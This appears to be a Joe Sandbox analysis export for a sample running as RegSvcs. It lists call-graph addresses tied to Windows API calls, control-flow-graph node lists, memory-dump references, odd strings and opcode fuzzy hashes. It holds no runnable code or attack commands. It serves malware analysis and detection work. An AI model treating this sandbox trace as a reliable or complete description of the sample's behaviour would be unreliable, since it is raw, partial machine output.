32303->32316 32304->32299 32308 5bfe721 32307->32308 32309 5bfe745 32308->32309 32310 5bfe89f 4 API calls 32308->32310 32311 5bfe8b0 4 API calls 32308->32311 32309->32299 32310->32309 32311->32309 32313 5bfe8b0 32312->32313 32314 5bfe8f6 32313->32314 32320 5bfd5fc 32313->32320 32314->32304 32319 5bfe8bd 32316->32319 32317 5bfe8f6 32317->32304 32318 5bfd5fc 4 API calls 32318->32317 32319->32317 32319->32318 32321 5bfd607 32320->32321 32323 5bfe968 32321->32323 32324 5bfd630 32321->32324 32323->32323 32325 5bfd63b 32324->32325 32331 5bfd640 32325->32331 32327 5bfe9d7 32335 6e34108 32327->32335 32344 6e34120 32327->32344 32328 5bfea11 32328->32323 32334 5bfd64b 32331->32334 32332 5bffb78 32332->32327 32333 5bfe700 4 API calls 32333->32332 32334->32332 32334->32333 32337 6e34151 32335->32337 32338 6e34251 32335->32338 32336 6e3415d 32336->32328 32337->32336 32353 6e34389 32337->32353 32363 6e34398 32337->32363 32338->32328 32339 6e3419d 32373 6e35aa0 32339->32373 32388 6e35a9d 32339->32388 32346 6e34151 32344->32346 32347 6e34251 32344->32347 32345 6e3415d 32345->32328 32346->32345 32351 6e34389 2 API calls 32346->32351 32352 6e34398 2 API calls 32346->32352 32347->32328 32348 6e3419d 32349 6e35aa0 2 API calls 32348->32349 32350 6e35a9d 2 API calls 32348->32350 32349->32347 32350->32347 32351->32348 32352->32348 32356 6e34392 32353->32356 32356->32339 32357 6e3441c 32356->32357 32403 6e33380 32356->32403 32357->32339 32358 6e34414 32358->32357 32359 6e34620 GetModuleHandleW 32358->32359 32360 6e3464d 32359->32360 32360->32339 32364 6e3439e 32363->32364 32364->32339 32365 6e33380 GetModuleHandleW 32364->32365 32367 6e3441c 32364->32367 32366 6e34404 32365->32366 32366->32367 32371 6e34680 GetModuleHandleW 32366->32371 32372 6e34670 GetModuleHandleW 32366->32372 32367->32339 32368 6e34414 32368->32367 32369 6e34620 GetModuleHandleW 32368->32369 32370 6e3464d 32369->32370 32370->32339 32371->32368 32372->32368 32374 6e35aa6 32373->32374 32414 6e333fc 32374->32414 32377 
6e35b4e 32378 6e35b7a 32377->32378 32379 6e33380 GetModuleHandleW 32377->32379 32378->32378 32380 6e35bbe 32379->32380 32439 6e36870 32380->32439 32445 6e36980 32380->32445 32387 6e333fc GetModuleHandleW 32387->32377 32389 6e35aa0 32388->32389 32390 6e333fc GetModuleHandleW 32389->32390 32391 6e35b32 32390->32391 32396 6e35f50 GetModuleHandleW 32391->32396 32397 6e36000 GetModuleHandleW 32391->32397 32398 6e333e0 GetModuleHandleW 32391->32398 32399 6e333b0 GetModuleHandleW 32391->32399 32400 6e333fc GetModuleHandleW 32391->32400 32392 6e35b4e 32393 6e35b7a 32392->32393 32394 6e33380 GetModuleHandleW 32392->32394 32393->32393 32395 6e35bbe 32394->32395 32401 6e36870 CreateWindowExW 32395->32401 32402 6e36980 CreateWindowExW 32395->32402 32396->32392 32397->32392 32398->32392 32399->32392 32400->32392 32401->32393 32402->32393 32404 6e345d8 GetModuleHandleW 32403->32404 32406 6e34404 32404->32406 32406->32357 32407 6e34670 32406->32407 32411 6e34680 32406->32411 32408 6e34680 32407->32408 32409 6e33380 GetModuleHandleW 32408->32409 32410 6e34694 32409->32410 32410->32358 32412 6e33380 GetModuleHandleW 32411->32412 32413 6e34694 32412->32413 32413->32358 32415 6e33407 32414->32415 32416 6e35b32 32415->32416 32417 6e36161 GetModuleHandleW 32415->32417 32418 6e36170 GetModuleHandleW 32415->32418 32416->32387 32419 6e35f50 32416->32419 32424 6e36000 32416->32424 32429 6e333e0 32416->32429 32434 6e333b0 32416->32434 32417->32416 32418->32416 32421 6e35f60 32419->32421 32420 6e35f6b 32420->32377 32421->32420 32422 6e36161 GetModuleHandleW 32421->32422 32423 6e36170 GetModuleHandleW 32421->32423 32422->32420 32423->32420 32425 6e3602d 32424->32425 32426 6e360ae 32425->32426 32427 6e36161 GetModuleHandleW 32425->32427 32428 6e36170 GetModuleHandleW 32425->32428 32427->32426 32428->32426 32430 6e333e5 32429->32430 32431 6e35f6b 32430->32431 32432 6e36161 GetModuleHandleW 32430->32432 32433 6e36170 GetModuleHandleW 32430->32433 32431->32377 32432->32431 32433->32431 32435 
6e333b5 32434->32435 32436 6e333bf 32435->32436 32437 6e36161 GetModuleHandleW 32435->32437 32438 6e36170 GetModuleHandleW 32435->32438 32436->32377 32437->32436 32438->32436 32440 6e36880 32439->32440 32441 6e36886 32439->32441 32440->32378 32442 6e368a0 32441->32442 32443 6e34acc CreateWindowExW 32441->32443 32442->32378 32444 6e369b5 32443->32444 32444->32378 32446 6e36986 32445->32446 32447 6e34acc CreateWindowExW 32446->32447 32448 6e369b5 32447->32448 32448->32378 32449 12bd030 32450 12bd048 32449->32450 32451 12bd0a2 32450->32451 32456 6e36b77 32450->32456 32460 6e36b88 32450->32460 32464 6e378d8 32450->32464 32475 6e34af4 32450->32475 32457 6e36bae 32456->32457 32458 6e34af4 CallWindowProcW 32457->32458 32459 6e36bcf 32458->32459 32459->32451 32461 6e36bae 32460->32461 32462 6e34af4 CallWindowProcW 32461->32462 32463 6e36bcf 32462->32463 32463->32451 32465 6e3785f 32464->32465 32468 6e378db 32464->32468 32465->32451 32466 6e37949 32510 6e34c1c 32466->32510 32468->32466 32469 6e37939 32468->32469 32485 6e37a60 32469->32485 32491 6e37b3c 32469->32491 32497 6e37b1b 32469->32497 32505 6e37a70 32469->32505 32470 6e37947 32476 6e34aff 32475->32476 32477 6e37949 32476->32477 32479 6e37939 32476->32479 32478 6e34c1c CallWindowProcW 32477->32478 32480 6e37947 32478->32480 32481 6e37a60 CallWindowProcW 32479->32481 32482 6e37a70 CallWindowProcW 32479->32482 32483 6e37b1b CallWindowProcW 32479->32483 32484 6e37b3c CallWindowProcW 32479->32484 32481->32480 32482->32480 32483->32480 32484->32480 32486 6e379ef 32485->32486 32488 6e37a6b 32485->32488 32486->32470 32487 6e37b10 32487->32470 32489 6e37b1b CallWindowProcW 32488->32489 32514 6e37b28 32488->32514 32489->32487 32492 6e37afa 32491->32492 32493 6e37b4a 32491->32493 32495 6e37b1b CallWindowProcW 32492->32495 32496 6e37b28 CallWindowProcW 32492->32496 32494 6e37b10 32494->32470 32495->32494 32496->32494 32498 6e37b23 32497->32498 32499 6e37aa7 32497->32499 32503 6e38f60 CallWindowProcW 32498->32503 32504 6e37b39 
32498->32504 32501 6e37b1b CallWindowProcW 32499->32501 32502 6e37b28 CallWindowProcW 32499->32502 32500 6e37b10 32500->32470 32501->32500 32502->32500 32503->32504 32504->32470 32506 6e37a76 32505->32506 32508 6e37b1b CallWindowProcW 32506->32508 32509 6e37b28 CallWindowProcW 32506->32509 32507 6e37b10 32507->32470 32508->32507 32509->32507 32511 6e34c27 32510->32511 32512 6e3902a CallWindowProcW 32511->32512 32513 6e38fd9 32511->32513 32512->32513 32513->32470 32515 6e37b39 32514->32515 32517 6e38f60 32514->32517 32515->32487 32518 6e34c1c CallWindowProcW 32517->32518 32519 6e38f7a 32518->32519 32519->32515 32520 6e3b158 32521 6e3b460 32520->32521 32522 6e3b180 32520->32522 32523 6e3b189 32522->32523 32526 6e3a69c 32522->32526 32525 6e3b1ac 32527 6e3a6a7 32526->32527 32528 6e3b4a3 32527->32528 32530 6e3a6b8 32527->32530 32528->32525 32531 6e3b4d8 OleInitialize 32530->32531 32532 6e3b53c 32531->32532 32532->32528

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 530 16119b8-1611a13 534 1611a35-1611a84 530->534 535 1611a15-1611a34 530->535 539 1611a86-1611a8d 534->539 540 1611a9f 534->540 541 1611a96-1611a9d 539->541 542 1611a8f-1611a94 539->542 544 1611aa7 540->544 543 1611aaa-1611abe 541->543 542->543 546 1611ac0-1611ac7 543->546 547 1611ad4-1611adc 543->547 544->543 548 1611ac9-1611acb 546->548 549 1611acd-1611ad2 546->549 550 1611ade-1611ae2 547->550 548->550 549->550 552 1611b42-1611b45 550->552 553 1611ae4-1611af9 550->553 554 1611b47-1611b5c 552->554 555 1611b8d-1611b93 552->555 553->552 561 1611afb-1611afe 553->561 554->555 565 1611b5e-1611b62 554->565 557 1611b99-1611b9b 555->557 558 161268e 555->558 557->558 559 1611ba1-1611ba6 557->559 562 1612693-1612854 558->562 563 161263c-1612640 559->563 564 1611bac 559->564 566 1611b00-1611b02 561->566 567 1611b1d-1611b3b call 16102a8 561->567 583 1612876-1612918 562->583 584 1612856-1612873 562->584 568 1612642-1612645 563->568 569 1612647-161268d 563->569 564->563 570 1611b64-1611b68 565->570 571 1611b6a-1611b88 call 16102a8 565->571 566->567 572 1611b04-1611b07 566->572 567->552 568->562 568->569 570->555 570->571 571->555 572->552 577 1611b09-1611b1b 572->577 577->552 577->567 587 161291a-1612934 583->587 588 161293c 583->588 584->583 589 1612956-161295b 587->589 590 1612936-1612939 587->590 591 161295e-1612ca1 588->591 592 161293e-1612954 588->592 589->591 590->588 601 1612ca3-1612ca5 591->601 602 1612cb2-1612cba 591->602 592->589 603 1612ca7-1612ca9 601->603 604 1612cab-1612cb0 601->604 605 1612cbc-1612cca 602->605 603->605 604->605 608 1612ce0-1612ce8 605->608 609 1612ccc-1612cce 605->609 612 1612ceb-1612cee 608->612 610 1612cd0-1612cd5 609->610 611 1612cd7-1612cde 609->611 610->612 611->612 614 1612cf0-1612cfe 612->614 615 1612d05-1612d09 612->615 614->615 622 1612d00 614->622 616 1612d22-1612d25 615->616 617 1612d0b-1612d19 615->617 618 1612d27-1612d2b 616->618 619 1612d2d-1612d62 
616->619 617->616 624 1612d1b 617->624 618->619 621 1612d64-1612d7b 618->621 628 1612dc4-1612dc9 619->628 626 1612d81-1612d8d 621->626 627 1612d7d-1612d7f 621->627 622->615 624->616 629 1612d97-1612da1 626->629 630 1612d8f-1612d95 626->630 627->628 631 1612da9 629->631 632 1612da3 629->632 630->631 634 1612db1-1612dbd 631->634 632->631 634->628
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2951021070.0000000001610000.00000040.00000800.00020000.00000000.sdmp, Offset: 01610000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_1610000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Xbq$Xbq$Xbq$Xbq$Xbq$Xbq
                                                              • API String ID: 0-1317942629
                                                              • Opcode ID: 6efd531f1782e88f95c6e0ed799ef8279121bc227b1ffbdf128143b3ed6c347f
                                                              • Instruction ID: b136074112b6c3048dd3362626ba95e547c8a4c1c012c1d858553c9bac1cfcde
                                                              • Opcode Fuzzy Hash: 6efd531f1782e88f95c6e0ed799ef8279121bc227b1ffbdf128143b3ed6c347f
                                                              • Instruction Fuzzy Hash: 6B728C375493528BC7E18FB1CA521A4BBE1EBD3235738C69DC1C686943D3B28887DB61
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2951021070.0000000001610000.00000040.00000800.00020000.00000000.sdmp, Offset: 01610000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_1610000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: N
                                                              • API String ID: 0-1130791706
                                                              • Opcode ID: d8a2e3678ced392e5bb1d585044a643b5f17483a69924f7c0b3a237c8eab6cda
                                                              • Instruction ID: 9e422c6170d689ab144f2b32ed08281e013276b948ddf2f6cd1c06e0dd274996
                                                              • Opcode Fuzzy Hash: d8a2e3678ced392e5bb1d585044a643b5f17483a69924f7c0b3a237c8eab6cda
                                                              • Instruction Fuzzy Hash: D673E631C10B5A8EDB11EF68C854A9DFBB1FF99300F15D69AE44867225EB70AAC4CF41

                                                              Control-flow Graph

                                                              control_flow_graph 1612 5bf7a68-5bf7a88 1613 5bf7a8f-5bf7aef 1612->1613 1614 5bf7a8a 1612->1614 1616 5bf7af5-5bf7c06 1613->1616 1617 5bf7e22-5bf7e4a 1613->1617 1614->1613 1659 5bf7c08-5bf7c14 1616->1659 1660 5bf7c30 1616->1660 1620 5bf85e7-5bf860f 1617->1620 1621 5bf7e50-5bf7e77 1617->1621 1628 5bf889e 1620->1628 1629 5bf8615-5bf8873 1620->1629 1625 5bf7e7d-5bf7f20 1621->1625 1626 5bf8181-5bf84ed 1621->1626 1788 5bf7f26 call 1613168 1625->1788 1789 5bf7f26 call 1613158 1625->1789 1773 5bf84ef-5bf8504 1626->1773 1774 5bf8506-5bf8517 1626->1774 1630 5bf889f-5bf88a5 1628->1630 1629->1630 1662 5bf7c1e-5bf7c24 1659->1662 1663 5bf7c16-5bf7c1c 1659->1663 1666 5bf7c36-5bf7dd8 1660->1666 1667 5bf7c2e 1662->1667 1663->1667 1742 5bf7dda-5bf7de6 1666->1742 1743 5bf7de7 1666->1743 1667->1666 1669 5bf7f2b-5bf8082 1728 5bf809b-5bf80ac 1669->1728 1729 5bf8084-5bf8099 1669->1729 1736 5bf80ad-5bf8138 1728->1736 1729->1736 1761 5bf8140-5bf817c 1736->1761 1742->1743 1743->1617 1767 5bf85e6 1761->1767 1767->1620 1777 5bf8518-5bf85e5 1773->1777 1774->1777 1777->1767 1788->1669 1789->1669
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2952721542.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_5bf0000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Te^q
                                                              • API String ID: 0-671973202
                                                              • Opcode ID: c3d36ea3d91b0e2a1db8333b8a5261ad834bb37b2b2406bb9af2150c728b0278
                                                              • Instruction ID: 88f231e3fabc2e69698351c4cd902ae1fb8050e20212cb6d7a970eb23dbcc530
                                                              • Opcode Fuzzy Hash: c3d36ea3d91b0e2a1db8333b8a5261ad834bb37b2b2406bb9af2150c728b0278
                                                              • Instruction Fuzzy Hash: FB72D174A00218CFDB65DF65D994BADBBB2FB89300F1084E9D909A7364CB35AE85CF50

                                                              Control-flow Graph

                                                              control_flow_graph 1790 161ef88-161efb7 1791 161efb9 1790->1791 1792 161efbe-161f054 call 1617f68 1790->1792 1791->1792 1795 161f0f3-161f0f9 1792->1795 1796 161f059-161f06c 1795->1796 1797 161f0ff-161f117 1795->1797 1800 161f073-161f0c4 1796->1800 1801 161f06e 1796->1801 1798 161f119-161f126 1797->1798 1799 161f12b-161f13e 1797->1799 1802 161f4c1-161f5be 1798->1802 1803 161f140 1799->1803 1804 161f145-161f161 1799->1804 1818 161f0d7-161f0e9 1800->1818 1819 161f0c6-161f0d4 1800->1819 1801->1800 1809 161f5c0-161f5c5 call 1617f68 1802->1809 1810 161f5c6-161f5d0 1802->1810 1803->1804 1806 161f163 1804->1806 1807 161f168-161f18c 1804->1807 1806->1807 1814 161f193-161f1c5 1807->1814 1815 161f18e 1807->1815 1809->1810 1824 161f1c7 1814->1824 1825 161f1cc-161f20e 1814->1825 1815->1814 1821 161f0f0 1818->1821 1822 161f0eb 1818->1822 1819->1797 1821->1795 1822->1821 1824->1825 1827 161f210 1825->1827 1828 161f215-161f21e 1825->1828 1827->1828 1829 161f446-161f44c 1828->1829 1830 161f223-161f248 1829->1830 1831 161f452-161f465 1829->1831 1832 161f24a 1830->1832 1833 161f24f-161f286 1830->1833 1834 161f467 1831->1834 1835 161f46c-161f487 1831->1835 1832->1833 1843 161f288 1833->1843 1844 161f28d-161f2bf 1833->1844 1834->1835 1836 161f489 1835->1836 1837 161f48e-161f4a2 1835->1837 1836->1837 1841 161f4a4 1837->1841 1842 161f4a9-161f4bf LdrInitializeThunk 1837->1842 1841->1842 1842->1802 1843->1844 1846 161f2c1-161f2e6 1844->1846 1847 161f323-161f336 1844->1847 1848 161f2e8 1846->1848 1849 161f2ed-161f31b 1846->1849 1850 161f338 1847->1850 1851 161f33d-161f362 1847->1851 1848->1849 1849->1847 1850->1851 1854 161f371-161f3a9 1851->1854 1855 161f364-161f365 1851->1855 1856 161f3b0-161f411 call 161ed68 1854->1856 1857 161f3ab 1854->1857 1855->1831 1863 161f413 1856->1863 1864 161f418-161f43c 1856->1864 1857->1856 1863->1864 1867 161f443 1864->1867 1868 161f43e 1864->1868 1867->1829 1868->1867
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2951021070.0000000001610000.00000040.00000800.00020000.00000000.sdmp, Offset: 01610000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_1610000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 224ad25f3e4aa48fc349488bd8b7acedfc4b06e1c15d807fb298d2411f561bd8
                                                              • Instruction ID: b1f4d9e6070faea6091d65113a8c1640d84728f73f6bae37c39e6ff39775f38a
                                                              • Opcode Fuzzy Hash: 224ad25f3e4aa48fc349488bd8b7acedfc4b06e1c15d807fb298d2411f561bd8
                                                              • Instruction Fuzzy Hash: 76F1F474E01218CFDB14DFA9D884B9DBBB2BF88304F54C1A9E808AB359DB749985CF50
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2951021070.0000000001610000.00000040.00000800.00020000.00000000.sdmp, Offset: 01610000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_1610000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: aa629cbe8b3315b3867bfc6780aeb5b243c1a7346679b45f781255209edd485e
                                                              • Instruction ID: 50b3c24558ca5fd195bfeabd2941c4e3fe4dc61c90fecaa4bff88bd5386407de
                                                              • Opcode Fuzzy Hash: aa629cbe8b3315b3867bfc6780aeb5b243c1a7346679b45f781255209edd485e
                                                              • Instruction Fuzzy Hash: DBC1BF74E01218CFDB14DFA5D984B9DBBB6FB88300F2085A9D809AB354DB359E85CF11
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2951021070.0000000001610000.00000040.00000800.00020000.00000000.sdmp, Offset: 01610000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_1610000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 337672001beb1c53943e26d69608f7b1225482ed27a82ee319f77339e13a2ff3
                                                              • Instruction ID: 187ff9ca9b0f5c0945afbdadefa280b9d32b01b22a211a7d49668e52e3d28a5d
                                                              • Opcode Fuzzy Hash: 337672001beb1c53943e26d69608f7b1225482ed27a82ee319f77339e13a2ff3
                                                              • Instruction Fuzzy Hash: F391A071E00219CBCF29DFB9CD546AEBAF2BF84310F188569D805A7399DB359D06CB90
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2951021070.0000000001610000.00000040.00000800.00020000.00000000.sdmp, Offset: 01610000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_1610000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cdf7edf66ec8229131a5f93cc3eb624fcdb8037977c2e19e8af40d4ade78b232
                                                              • Instruction ID: aeb8b22da5e7690fb4d5a5af207d882993ff91d809c75efdf04ddc68c62df98c
                                                              • Opcode Fuzzy Hash: cdf7edf66ec8229131a5f93cc3eb624fcdb8037977c2e19e8af40d4ade78b232
                                                              • Instruction Fuzzy Hash: 6CA13570D012088FEB14DFA8C984B9DBBB1FF89314F249269E408AB3A5DB709985CF55
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2951021070.0000000001610000.00000040.00000800.00020000.00000000.sdmp, Offset: 01610000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_1610000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 59e9fed890e7e76b0ee3085d28df7d3a9b1839f502eaa7bf698ce2cf0f9b89f8
                                                              • Instruction ID: 7789d6ae7e5cec6d455b342077ac5d70e31cefb883cbc4f14bb24e63ad001c94
                                                              • Opcode Fuzzy Hash: 59e9fed890e7e76b0ee3085d28df7d3a9b1839f502eaa7bf698ce2cf0f9b89f8
                                                              • Instruction Fuzzy Hash: 5FA11370D012088FEB14DFA8C984B9DBBB1FF88314F249269E508AB3A5DB709985CF55
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2952721542.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_5bf0000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cbac078efe35fba905aea6c0d2c2289a67fe0270ec650ff9cc919f314818cbd9
                                                              • Instruction ID: e3a277c9552a9130f70de15c685a682de7a531579c08a3c42b0a1ca47da8af3e
                                                              • Opcode Fuzzy Hash: cbac078efe35fba905aea6c0d2c2289a67fe0270ec650ff9cc919f314818cbd9
                                                              • Instruction Fuzzy Hash: 00A19074E012288FEB28CF6AD944B9DFBF2BB89300F14D1AAD509A7255DB345A85CF11
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2952721542.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_5bf0000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d2bb4337cc29412e526cb8fe5d722ed7553216a5f4c73b41c3b7d79dd3d23a9c
                                                              • Instruction ID: d347eb462c1a71908fd203d468e20acb510f70440528833ce23cd67fc1303e24
                                                              • Opcode Fuzzy Hash: d2bb4337cc29412e526cb8fe5d722ed7553216a5f4c73b41c3b7d79dd3d23a9c
                                                              • Instruction Fuzzy Hash: FCA19070E012288FEB28CF6AD944B9DFBF2BF89300F14D1AAD509A7255DB345A85CF51
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2952721542.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_5bf0000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 59bd5db037f2977271363dd90a4a8cd2cc6811bfccf74e8f3e2dc66a983f633d
                                                              • Instruction ID: 841e97b0a5872c91fcd45d2f52ba2c03ab364f42a023745e996ec12a78cb94c3
                                                              • Opcode Fuzzy Hash: 59bd5db037f2977271363dd90a4a8cd2cc6811bfccf74e8f3e2dc66a983f633d
                                                              • Instruction Fuzzy Hash: BF810670E012088BDB14DFAAE9506ADBBF2FF88310F24D5A9E514BB354DB34A946CF54
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2951021070.0000000001610000.00000040.00000800.00020000.00000000.sdmp, Offset: 01610000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_1610000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: df85f9044be0a7a806353bf03609aef4af58d4528dc6991d317d25e05b0a4bc3
                                                              • Instruction ID: a2b515572fb026a154ff82d69f3f04f7f3368d85357acb523d4e9da6289935e0
                                                              • Opcode Fuzzy Hash: df85f9044be0a7a806353bf03609aef4af58d4528dc6991d317d25e05b0a4bc3
                                                              • Instruction Fuzzy Hash: 83910270D01218CFEB10DFA8C884BACBBB5FF49314F249269E509AB3A5DB709985CF55
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2952721542.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_5bf0000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2eca51451958cb5988789d0a1e0ea1aa34d30f6ed33944c063ae28b035e09614
                                                              • Instruction ID: 43fcc3650ba7f6fabb1573f80d88050b828a1b8c994e54bef3318ce3c66c33db
                                                              • Opcode Fuzzy Hash: 2eca51451958cb5988789d0a1e0ea1aa34d30f6ed33944c063ae28b035e09614
                                                              • Instruction Fuzzy Hash: DE810670E016088BDB18DFAAD9506ADBBF2FF88300F24D5A9E514BB354DB346946CF50
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2952721542.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_5bf0000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bf5ebfceb06030625eb03631a63d78ac4b9dc3c4908d7b5eff0d10eea792672d
                                                              • Instruction ID: ed4ea98b2e574a0e0d0999ef8784e2493c87529e0dfc28aeff51dab9c6cd98b8
                                                              • Opcode Fuzzy Hash: bf5ebfceb06030625eb03631a63d78ac4b9dc3c4908d7b5eff0d10eea792672d
                                                              • Instruction Fuzzy Hash: 43717271E016188FEB68CF6AC944B9DFBF2AF89300F14C4AAD50DA7254DB345A85CF51
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2952721542.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_5bf0000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 46b4d3a418f8147a3accfaeafc412c4ba9689ac5bd83290623b0065f79e4c2b0
                                                              • Instruction ID: 5c5cb2ed73e155a7126a2b4a403ff1326cdfc24a618a701a7d402125d40ab949
                                                              • Opcode Fuzzy Hash: 46b4d3a418f8147a3accfaeafc412c4ba9689ac5bd83290623b0065f79e4c2b0
                                                              • Instruction Fuzzy Hash: 0A4168B1E016188BEB58CF6BCD457CAFAF3AFC8300F14C1AAD50CA6265DB740A858F51
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2951021070.0000000001610000.00000040.00000800.00020000.00000000.sdmp, Offset: 01610000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_1610000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 01cfcf92b915ae3c6dd53e1be1e28b4e44cabbbe604220697cc0cace9b4c5949
                                                              • Instruction ID: 9fb4a5d0c4457cd0aebcb74e8bdc1cad36421fd801fdc9661bbd3a4b638728f7
                                                              • Opcode Fuzzy Hash: 01cfcf92b915ae3c6dd53e1be1e28b4e44cabbbe604220697cc0cace9b4c5949
                                                              • Instruction Fuzzy Hash: ED41E174E01248CBDB18CFAAD94469EBBB6EF89300F24D129D419AB368DB345946CF51

                                                              Control-flow Graph

                                                              control_flow_graph 1869 6e343e8-6e343f7 1870 6e34423-6e34427 1869->1870 1871 6e343f9-6e34406 call 6e33380 1869->1871 1872 6e3443b-6e3447c 1870->1872 1873 6e34429-6e34433 1870->1873 1878 6e34408 1871->1878 1879 6e3441c 1871->1879 1880 6e34489-6e34497 1872->1880 1881 6e3447e-6e34486 1872->1881 1873->1872 1923 6e3440e call 6e34680 1878->1923 1924 6e3440e call 6e34670 1878->1924 1879->1870 1882 6e344bb-6e344bd 1880->1882 1883 6e34499-6e3449e 1880->1883 1881->1880 1885 6e344c0-6e344c7 1882->1885 1886 6e344a0-6e344a7 call 6e3338c 1883->1886 1887 6e344a9 1883->1887 1884 6e34414-6e34416 1884->1879 1888 6e34558-6e34618 1884->1888 1889 6e344d4-6e344db 1885->1889 1890 6e344c9-6e344d1 1885->1890 1892 6e344ab-6e344b9 1886->1892 1887->1892 1918 6e34620-6e3464b GetModuleHandleW 1888->1918 1919 6e3461a-6e3461d 1888->1919 1893 6e344e8-6e344f1 1889->1893 1894 6e344dd-6e344e5 1889->1894 1890->1889 1892->1885 1899 6e344f3-6e344fb 1893->1899 1900 6e344fe-6e34503 1893->1900 1894->1893 1899->1900 1901 6e34521-6e34525 1900->1901 1902 6e34505-6e3450c 1900->1902 1925 6e34528 call 6e34940 1901->1925 1926 6e34528 call 6e34930 1901->1926 1902->1901 1904 6e3450e-6e3451e call 6e312d4 call 6e3339c 1902->1904 1904->1901 1905 6e3452b-6e3452e 1908 6e34551-6e34557 1905->1908 1909 6e34530-6e3454e 1905->1909 1909->1908 1920 6e34654-6e34668 1918->1920 1921 6e3464d-6e34653 1918->1921 1919->1918 1921->1920 1923->1884 1924->1884 1925->1905 1926->1905
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2953235093.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6e30000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID:
                                                              • API String ID: 4139908857-0
                                                              • Opcode ID: 8f8b47ae74243aca9be33ffea3a577d5bf1e5f990cc2506e0c6ded238b5a86a9
